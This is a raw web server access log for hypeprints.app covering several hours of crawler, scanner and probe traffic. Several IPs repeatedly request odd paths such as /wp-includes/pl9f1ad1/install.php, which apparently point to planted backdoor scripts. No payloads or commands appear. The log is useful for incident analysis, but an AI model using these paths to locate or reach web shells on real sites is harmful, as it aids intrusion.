File: /home/griievz70lba/access-logs/hypeprints.app
52.167.144.171 - - [16/Sep/2025:05:18:02 -0700] "GET /wf1122492/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 10 **0/10104**
207.46.13.6 - - [16/Sep/2025:05:20:30 -0700] "GET /t1295630/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 10 **0/10860**
20.15.133.184 - - [16/Sep/2025:05:23:26 -0700] "GET /?gardening/others/1p1ex HTTP/1.1" 200 1 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 11 **0/11200**
207.46.13.6 - - [16/Sep/2025:05:23:27 -0700] "GET /?gardening/others/1p1ex HTTP/1.1" 200 1 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 9 **0/9190**
207.46.13.6 - - [16/Sep/2025:05:24:56 -0700] "GET /t4574299/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 4 **0/4060**
40.77.167.43 - - [16/Sep/2025:05:26:21 -0700] "GET /t3656336/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 11 **0/11435**
40.77.167.43 - - [16/Sep/2025:05:29:20 -0700] "GET /j3213267/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 8 **0/8843**
204.12.252.98 - - [16/Sep/2025:05:29:55 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 10 **0/10616**
52.167.144.195 - - [16/Sep/2025:05:38:52 -0700] "GET /wf3438607/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 9 **0/9311**
208.110.64.178 - - [16/Sep/2025:05:41:50 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 10 **0/10711**
91.224.92.17 - - [16/Sep/2025:05:53:21 -0700] "GET / HTTP/1.1" 200 - "-" "-" 10 **0/10155**
208.110.64.178 - - [16/Sep/2025:05:53:24 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 4 **0/4399**
20.65.192.150 - - [16/Sep/2025:05:54:23 -0700] "GET /developmentserver/metadatauploader HTTP/1.1" 200 - "-" "Mozilla/5.0 zgrab/0.x" 8 **0/8467**
45.135.193.100 - - [16/Sep/2025:05:54:30 -0700] "GET / HTTP/1.1" 200 - "-" "-" 11 **0/11864**
52.167.144.225 - - [16/Sep/2025:05:57:04 -0700] "GET /u3236999/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 4 **0/4909**
52.167.144.225 - - [16/Sep/2025:05:57:15 -0700] "GET /lz1600027/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 5 **0/5183**
204.12.252.98 - - [16/Sep/2025:06:01:35 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 10 **0/10468**
52.180.157.167 - - [16/Sep/2025:06:02:09 -0700] "GET /actuator/health HTTP/1.1" 200 - "-" "Mozilla/5.0 zgrab/0.x" 5 **0/5376**
44.203.172.133 - - [16/Sep/2025:06:05:51 -0700] "GET / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" 514 **0/514326**
208.110.64.178 - - [16/Sep/2025:06:05:59 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 10 **0/10587**
148.251.41.83 - - [16/Sep/2025:06:06:43 -0700] "\x03" 400 - "-" "-" 7 **0/7457**
148.251.41.83 - - [16/Sep/2025:06:07:35 -0700] "\x03" 400 - "-" "-" 8 **0/8259**
170.106.35.187 - - [16/Sep/2025:06:07:58 -0700] "GET / HTTP/1.1" 200 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 5 **0/5339**
148.251.41.83 - - [16/Sep/2025:06:08:26 -0700] "\x03" 400 - "-" "-" 8 **0/8179**
148.251.41.83 - - [16/Sep/2025:06:09:17 -0700] "\x03" 400 - "-" "-" 7 **0/7646**
148.251.41.83 - - [16/Sep/2025:06:10:08 -0700] "\x03" 400 - "-" "-" 10 **0/10502**
157.55.39.194 - - [16/Sep/2025:06:10:58 -0700] "GET /t4220819/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 4 **0/4524**
148.251.41.83 - - [16/Sep/2025:06:11:00 -0700] "\x03" 400 - "-" "-" 1 **0/1960**
208.110.64.178 - - [16/Sep/2025:06:11:04 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 12 **0/12071**
208.110.64.178 - - [16/Sep/2025:06:11:23 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 5 **0/5726**
148.251.41.83 - - [16/Sep/2025:06:11:50 -0700] "\x03" 400 - "-" "-" 2 **0/2325**
148.251.41.83 - - [16/Sep/2025:06:12:41 -0700] "\x03" 400 - "-" "-" 1 **0/1745**
148.251.41.83 - - [16/Sep/2025:06:13:31 -0700] "\x03" 400 - "-" "-" 1 **0/1995**
148.251.41.83 - - [16/Sep/2025:06:14:25 -0700] "\x03" 400 - "-" "-" 513 **0/513389**
148.251.41.83 - - [16/Sep/2025:06:15:17 -0700] "\x03" 400 - "-" "-" 7 **0/7465**
148.251.41.83 - - [16/Sep/2025:06:16:08 -0700] "\x03" 400 - "-" "-" 7 **0/7434**
148.251.41.83 - - [16/Sep/2025:06:16:58 -0700] "\x03" 400 - "-" "-" 3 **0/3188**
148.251.41.83 - - [16/Sep/2025:06:17:49 -0700] "\x03" 400 - "-" "-" 6 **0/6689**
148.251.41.83 - - [16/Sep/2025:06:18:39 -0700] "\x03" 400 - "-" "-" 512 **0/512531**
148.251.41.83 - - [16/Sep/2025:06:19:30 -0700] "\x03" 400 - "-" "-" 2 **0/2321**
208.110.64.178 - - [16/Sep/2025:06:20:01 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 22 **0/22725**
148.251.41.83 - - [16/Sep/2025:06:20:22 -0700] "\x03" 400 - "-" "-" 2 **0/2083**
208.110.64.178 - - [16/Sep/2025:06:20:52 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 12 **0/12651**
52.167.144.18 - - [16/Sep/2025:06:21:03 -0700] "GET /t799505/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 4 **0/4655**
148.251.41.83 - - [16/Sep/2025:06:21:13 -0700] "\x03" 400 - "-" "-" 10 **0/10605**
148.251.41.83 - - [16/Sep/2025:06:22:04 -0700] "\x03" 400 - "-" "-" 8 **0/8149**
148.251.41.83 - - [16/Sep/2025:06:22:55 -0700] "\x03" 400 - "-" "-" 1 **0/1538**
148.251.41.83 - - [16/Sep/2025:06:23:46 -0700] "\x03" 400 - "-" "-" 1 **0/1873**
148.251.41.83 - - [16/Sep/2025:06:24:37 -0700] "\x03" 400 - "-" "-" 8 **0/8074**
148.251.41.83 - - [16/Sep/2025:06:25:29 -0700] "\x03" 400 - "-" "-" 1 **0/1335**
52.167.144.213 - - [16/Sep/2025:06:25:36 -0700] "GET /wf2285997/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 4 **0/4457**
148.251.41.83 - - [16/Sep/2025:06:26:20 -0700] "\x03" 400 - "-" "-" 7 **0/7650**
148.251.41.83 - - [16/Sep/2025:06:27:12 -0700] "\x03" 400 - "-" "-" 2 **0/2114**
52.167.144.213 - - [16/Sep/2025:06:27:24 -0700] "GET /s2061836/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 4 **0/4788**
204.12.252.98 - - [16/Sep/2025:06:27:53 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 5 **0/5173**
148.251.41.83 - - [16/Sep/2025:06:28:03 -0700] "\x03" 400 - "-" "-" 2 **0/2001**
148.251.41.83 - - [16/Sep/2025:06:28:54 -0700] "\x03" 400 - "-" "-" 7 **0/7811**
204.12.252.98 - - [16/Sep/2025:06:29:38 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 4 **0/4190**
148.251.41.83 - - [16/Sep/2025:06:29:45 -0700] "\x03" 400 - "-" "-" 2 **0/2502**
148.251.41.83 - - [16/Sep/2025:06:30:37 -0700] "\x03" 400 - "-" "-" 1 **0/1910**
148.251.41.83 - - [16/Sep/2025:06:31:28 -0700] "\x03" 400 - "-" "-" 8 **0/8060**
148.251.41.83 - - [16/Sep/2025:06:32:19 -0700] "\x03" 400 - "-" "-" 2 **0/2128**
148.251.41.83 - - [16/Sep/2025:06:33:10 -0700] "\x03" 400 - "-" "-" 1 **0/1844**
148.251.41.83 - - [16/Sep/2025:06:34:01 -0700] "\x03" 400 - "-" "-" 1 **0/1889**
52.167.144.213 - - [16/Sep/2025:06:34:15 -0700] "GET /wf4271647/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 4 **0/4832**
148.251.41.83 - - [16/Sep/2025:06:34:51 -0700] "\x03" 400 - "-" "-" 1 **0/1812**
148.251.41.83 - - [16/Sep/2025:06:35:42 -0700] "\x03" 400 - "-" "-" 1 **0/1914**
148.251.41.83 - - [16/Sep/2025:06:36:33 -0700] "\x03" 400 - "-" "-" 1 **0/1746**
148.251.41.83 - - [16/Sep/2025:06:37:24 -0700] "\x03" 400 - "-" "-" 2 **0/2129**
204.12.252.98 - - [16/Sep/2025:06:38:10 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 4 **0/4380**
148.251.41.83 - - [16/Sep/2025:06:38:14 -0700] "\x03" 400 - "-" "-" 1 **0/1797**
208.110.64.178 - - [16/Sep/2025:06:38:24 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 5 **0/5872**
148.251.41.83 - - [16/Sep/2025:06:39:05 -0700] "\x03" 400 - "-" "-" 1 **0/1798**
148.251.41.83 - - [16/Sep/2025:06:39:56 -0700] "\x03" 400 - "-" "-" 1 **0/1814**
148.251.41.83 - - [16/Sep/2025:06:40:47 -0700] "\x03" 400 - "-" "-" 7 **0/7572**
40.77.167.73 - - [16/Sep/2025:06:41:31 -0700] "GET /t2303540/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 4 **0/4540**
148.251.41.83 - - [16/Sep/2025:06:41:38 -0700] "\x03" 400 - "-" "-" 2 **0/2375**
148.251.41.83 - - [16/Sep/2025:06:42:29 -0700] "\x03" 400 - "-" "-" 6 **0/6643**
204.12.252.98 - - [16/Sep/2025:06:43:04 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 5 **0/5102**
148.251.41.83 - - [16/Sep/2025:06:43:20 -0700] "\x03" 400 - "-" "-" 1 **0/1806**
40.77.167.68 - - [16/Sep/2025:06:44:09 -0700] "GET /wf4428390/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 5 **0/5602**
148.251.41.83 - - [16/Sep/2025:06:44:11 -0700] "\x03" 400 - "-" "-" 6 **0/6360**
208.110.64.178 - - [16/Sep/2025:06:44:28 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 11 **0/11877**
148.251.41.83 - - [16/Sep/2025:06:45:01 -0700] "\x03" 400 - "-" "-" 4 **0/4478**
148.251.41.83 - - [16/Sep/2025:06:45:53 -0700] "\x03" 400 - "-" "-" 1 **0/1938**
148.251.41.83 - - [16/Sep/2025:06:46:44 -0700] "\x03" 400 - "-" "-" 1 **0/1996**
148.251.41.83 - - [16/Sep/2025:06:47:34 -0700] "\x03" 400 - "-" "-" 2 **0/2400**
148.251.41.83 - - [16/Sep/2025:06:48:25 -0700] "\x03" 400 - "-" "-" 10 **0/10133**
157.55.39.52 - - [16/Sep/2025:06:48:53 -0700] "GET /wf1207453/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 10 **0/10472**
148.251.41.83 - - [16/Sep/2025:06:49:16 -0700] "\x03" 400 - "-" "-" 1 **0/1956**
148.251.41.83 - - [16/Sep/2025:06:50:06 -0700] "\x03" 400 - "-" "-" 2 **0/2202**
148.251.41.83 - - [16/Sep/2025:06:50:58 -0700] "\x03" 400 - "-" "-" 512 **0/512076**
148.251.41.83 - - [16/Sep/2025:06:51:49 -0700] "\x03" 400 - "-" "-" 6 **0/6559**
148.251.41.83 - - [16/Sep/2025:06:52:40 -0700] "\x03" 400 - "-" "-" 7 **0/7122**
52.167.144.171 - - [16/Sep/2025:06:52:55 -0700] "GET /t4648025/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 12 **0/12678**
148.251.41.83 - - [16/Sep/2025:06:53:32 -0700] "\x03" 400 - "-" "-" 1 **0/1650**
52.167.144.171 - - [16/Sep/2025:06:53:44 -0700] "GET /ks4170633/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 3 **0/3937**
208.110.64.178 - - [16/Sep/2025:06:53:45 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 12 **0/12014**
148.251.41.83 - - [16/Sep/2025:06:54:23 -0700] "\x03" 400 - "-" "-" 9 **0/9339**
148.251.41.83 - - [16/Sep/2025:06:55:17 -0700] "\x03" 400 - "-" "-" 1 **0/1866**
208.110.64.178 - - [16/Sep/2025:06:55:22 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 5 **0/5298**
148.251.41.83 - - [16/Sep/2025:06:56:08 -0700] "\x03" 400 - "-" "-" 2 **0/2349**
148.251.41.83 - - [16/Sep/2025:06:56:58 -0700] "\x03" 400 - "-" "-" 1 **0/1836**
148.251.41.83 - - [16/Sep/2025:06:57:49 -0700] "\x03" 400 - "-" "-" 1 **0/1924**
182.42.105.144 - - [16/Sep/2025:06:58:03 -0700] "GET / HTTP/1.1" 200 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 11 **0/11537**
148.251.41.83 - - [16/Sep/2025:06:58:41 -0700] "\x03" 400 - "-" "-" 1 **0/1908**
148.251.41.83 - - [16/Sep/2025:06:59:33 -0700] "\x03" 400 - "-" "-" 10 **0/10001**
148.251.41.83 - - [16/Sep/2025:07:00:27 -0700] "\x03" 400 - "-" "-" 12 **0/12961**
148.251.41.83 - - [16/Sep/2025:07:01:24 -0700] "\x03" 400 - "-" "-" 1 **0/1888**
204.12.208.18 - - [16/Sep/2025:07:01:40 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 - "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; EasyBits GO v1.0; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 4 **0/4444**
204.12.208.18 - - [16/Sep/2025:07:01:42 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 - "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/522.11.1 (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1" 10 **0/10496**
148.251.41.83 - - [16/Sep/2025:07:02:16 -0700] "\x03" 400 - "-" "-" 2 **0/2221**
148.251.41.83 - - [16/Sep/2025:07:03:07 -0700] "\x03" 400 - "-" "-" 1 **0/1876**
148.251.41.83 - - [16/Sep/2025:07:03:59 -0700] "\x03" 400 - "-" "-" 1 **0/1758**
148.251.41.83 - - [16/Sep/2025:07:04:50 -0700] "\x03" 400 - "-" "-" 1 **0/1924**
34.227.94.114 - - [16/Sep/2025:07:05:15 -0700] "GET / HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36" 11 **0/11156**
204.12.252.98 - - [16/Sep/2025:07:05:21 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 4 **0/4860**
148.251.41.83 - - [16/Sep/2025:07:05:44 -0700] "\x03" 400 - "-" "-" 7 **0/7964**
208.110.64.178 - - [16/Sep/2025:07:05:47 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 2 **0/2753**
148.251.41.83 - - [16/Sep/2025:07:06:36 -0700] "\x03" 400 - "-" "-" 2 **0/2194**
148.251.41.83 - - [16/Sep/2025:07:07:29 -0700] "\x03" 400 - "-" "-" 2 **0/2116**
148.251.41.83 - - [16/Sep/2025:07:08:21 -0700] "\x03" 400 - "-" "-" 1 **0/1848**
148.251.41.83 - - [16/Sep/2025:07:09:13 -0700] "\x03" 400 - "-" "-" 1 **0/1875**
148.251.41.83 - - [16/Sep/2025:07:10:06 -0700] "\x03" 400 - "-" "-" 2 **0/2462**
148.251.41.83 - - [16/Sep/2025:07:10:59 -0700] "\x03" 400 - "-" "-" 2 **0/2307**
148.251.41.83 - - [16/Sep/2025:07:11:51 -0700] "\x03" 400 - "-" "-" 8 **0/8823**
204.12.252.98 - - [16/Sep/2025:07:12:07 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 7 **0/7324**
148.251.41.83 - - [16/Sep/2025:07:12:43 -0700] "\x03" 400 - "-" "-" 16 **0/16229**
148.251.41.83 - - [16/Sep/2025:07:13:36 -0700] "\x03" 400 - "-" "-" 1 **0/1935**
148.251.41.83 - - [16/Sep/2025:07:14:28 -0700] "\x03" 400 - "-" "-" 1 **0/1836**
40.77.167.46 - - [16/Sep/2025:07:15:07 -0700] "GET /ks4726664/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 4 **0/4851**
148.251.41.83 - - [16/Sep/2025:07:15:22 -0700] "\x03" 400 - "-" "-" 1 **0/1769**
148.251.41.83 - - [16/Sep/2025:07:16:15 -0700] "\x03" 400 - "-" "-" 14 **0/14940**
148.251.41.83 - - [16/Sep/2025:07:17:07 -0700] "\x03" 400 - "-" "-" 2 **0/2260**
208.110.64.178 - - [16/Sep/2025:07:17:46 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 5 **0/5151**
148.251.41.83 - - [16/Sep/2025:07:18:00 -0700] "\x03" 400 - "-" "-" 2 **0/2290**
52.167.144.189 - - [16/Sep/2025:07:23:14 -0700] "GET /j2049791/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 9 **0/9948**
207.46.13.102 - - [16/Sep/2025:07:24:21 -0700] "GET /s2710563/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 10 **0/10195**
207.46.13.102 - - [16/Sep/2025:07:26:52 -0700] "GET /ks4336700/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 10 **0/10964**
204.12.252.98 - - [16/Sep/2025:07:30:49 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 9 **0/9706**
5.26.75.54 - - [16/Sep/2025:07:30:58 -0700] "GET / HTTP/1.0" 200 - "-" "Hello World" 8 **0/8304**
208.110.64.178 - - [16/Sep/2025:07:31:46 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 5 **0/5494**
204.12.252.98 - - [16/Sep/2025:07:40:28 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 10 **0/10124**
204.12.252.98 - - [16/Sep/2025:07:41:44 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 12 **0/12903**
135.237.126.196 - - [16/Sep/2025:07:41:44 -0700] "MGLNDD_132.148.251.191_80\n" 400 - "-" "-" 1 **0/1641**
204.12.252.98 - - [16/Sep/2025:07:54:28 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 8 **0/8910**
208.110.64.178 - - [16/Sep/2025:07:56:10 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 9 **0/9480**
52.167.144.206 - - [16/Sep/2025:07:58:35 -0700] "GET /lz832704/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 11 **0/11536**
52.167.144.65 - - [16/Sep/2025:07:59:48 -0700] "GET /robots.txt HTTP/1.1" 200 129 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 2 **0/2933**
204.12.252.98 - - [16/Sep/2025:08:04:18 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 514 **0/514223**
